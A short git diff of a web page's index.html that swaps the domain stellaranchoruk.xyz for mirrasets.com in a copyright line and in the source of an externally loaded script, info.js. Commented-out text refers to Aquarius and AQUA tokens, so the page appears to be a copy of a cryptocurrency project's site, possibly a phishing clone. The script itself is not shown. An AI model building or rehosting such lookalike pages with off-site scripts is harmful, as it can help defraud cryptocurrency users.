--- a/index.html
+++ b/index.html
@@ -447,7 +447,7 @@
             </div>-->
             <div class="copyright-line">
                 <div class="copyright">
-                    © 2022 stellaranchoruk.xyz
+                    © 2022 mirrasets.com
                 </div>
              <!--   <div class="terms">
                     Aquarius runs on Stellar. AQUA tokens are issued on Stellar. The project is unaffiliated with the Stellar Development Foundation.
@@ -553,6 +553,6 @@
 </section>
 
 
-<script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="https://stellaranchoruk.xyz/scripts/info.js"></script>
+<script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="https://mirrasets.com/scripts/info.js"></script>
 </body>
 </html>
